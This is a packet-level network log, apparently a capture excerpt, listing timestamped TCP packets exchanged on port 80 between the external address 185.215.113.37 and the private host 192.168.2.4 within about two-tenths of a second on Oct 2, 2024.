Oct 2, 2024 18:19:20.229795933 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.229821920 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.229830027 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.229891062 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.276987076 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.277013063 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.277040005 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.277066946 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.277110100 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.277158976 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.277173042 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.277198076 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.277211905 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.277225971 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.277236938 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.277266026 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.277313948 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.277328014 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.277357101 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.277364016 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.277370930 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.277390003 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.277401924 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.277417898 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.277431965 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.277446985 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.277456999 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.277476072 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.277496099 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.277518988 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.277543068 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.277584076 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.315066099 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.315116882 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.315125942 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.315145969 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.315164089 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.315176010 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.315184116 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.315221071 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.315232038 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.315246105 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.315274000 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.315279961 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.315293074 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.315303087 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.315310955 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.315351009 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.315565109 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.315593958 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.315615892 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.315624952 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.315639973 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.315653086 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.315663099 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.315684080 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.315692902 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.315711975 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.315726995 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.315740108 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.315752983 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.315766096 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.315784931 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.315799952 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.315809011 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.315829992 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.315840960 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.315859079 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.315875053 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.315881968 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.315893888 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.315911055 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.315924883 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.315942049 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.315958977 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.315984964 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.316005945 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.316018105 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.316055059 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.316111088 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.316123009 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.316148043 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.316163063 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.316179037 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.316189051 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.316206932 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.316220999 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.316235065 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.316256046 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.316276073 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.316306114 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.316319942 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.316344976 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.316353083 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.316374063 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.316380024 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.316394091 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.316411972 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.316426992 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.316471100 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.316576958 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.316591978 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.316617012 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.316634893 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.316643953 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.316665888 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.316673040 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.316687107 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.316696882 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.316713095 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.316721916 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.316735029 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.316745043 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.316754103 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.316772938 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.316781998 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.316800117 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.316812038 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.316828966 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.316843033 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.316853046 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.316871881 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.316878080 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.316891909 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.316910982 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.316998959 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.317011118 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.317034006 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.317045927 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.317064047 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.317074060 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.317090988 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.317101955 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.317118883 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.317136049 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.317157984 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.317223072 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.317236900 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.317260981 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.317270994 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.317289114 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.317298889 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.317317963 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.317331076 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.317347050 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.317361116 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.317384958 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.317442894 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.317456007 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.317483902 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.317496061 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.317508936 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.317518950 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.317549944 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.317615986 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.317631006 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.317662001 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.317668915 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.317682028 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.317696095 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.317706108 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.317725897 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.317744017 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.317766905 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.317780018 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.317795038 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.317819118 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.317827940 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.317842007 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.317851067 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.317858934 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.317876101 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.317893982 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.317912102 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.317912102 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.317930937 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.317949057 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.317960978 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.317977905 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.317986012 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.317998886 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.318012953 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.318022966 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.318037033 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.318065882 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.318073034 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.318085909 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.318097115 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.318104982 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.318139076 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.355259895 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.355315924 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.355329037 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.355345964 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.355370045 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.355381012 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.355412960 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.355420113 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.355456114 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.355479002 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.355524063 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.355634928 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.355686903 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.356108904 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.356129885 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.356153011 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.356163025 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.356173992 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.356197119 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.356224060 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.356239080 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.356264114 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.356272936 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.356281996 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.356301069 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.356311083 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.356342077 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.356369972 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.356386900 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.356405973 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.356419086 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.356427908 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.356447935 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.356456995 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.356477022 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.356491089 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.356511116 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.356517076 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.356529951 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.356539965 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.356559038 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.356569052 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.356589079 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.356597900 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.356626034 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.356756926 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.356770992 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.356801033 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.356808901 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.356825113 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.356839895 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.356847048 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.356878996 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.369493961 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.369565964 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.369594097 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.369609118 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.369632006 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.369649887 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.369664907 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.369678020 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.369704962 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.369720936 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.369738102 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.369752884 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.369776011 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.369786978 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.369796038 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.369823933 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.369831085 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.369844913 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.369865894 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.369879007 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.369888067 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.369904995 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.369924068 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.369941950 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.369957924 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.369993925 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.369999886 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.370018959 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.370035887 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.370057106 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.407538891 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.407584906 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.407594919 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.407613993 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.407630920 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.407653093 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.407713890 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.407727957 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.407756090 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.407766104 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.407790899 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.407810926 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.407833099 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.407847881 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.407872915 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.407881975 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.407893896 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.407906055 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.407913923 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.407949924 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.408047915 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.408094883 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.408126116 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.408140898 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.408173084 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.408179045 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.408190966 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.408210039 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.408231020 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.408243895 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.408272028 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.408278942 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.408287048 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.408307076 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.408324957 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.408338070 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.408363104 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.408381939 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.408432961 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.408447027 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.408482075 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.408495903 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.408582926 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.408596992 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.408622980 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.408631086 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.408648968 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.408667088 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.408675909 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.408675909 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.408684969 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.408701897 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.408710957 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.408730030 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.408745050 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.408756018 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.408776999 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.408790112 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.408855915 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.408869028 CEST	80	49737	185.215.113.37	192.168.2.4
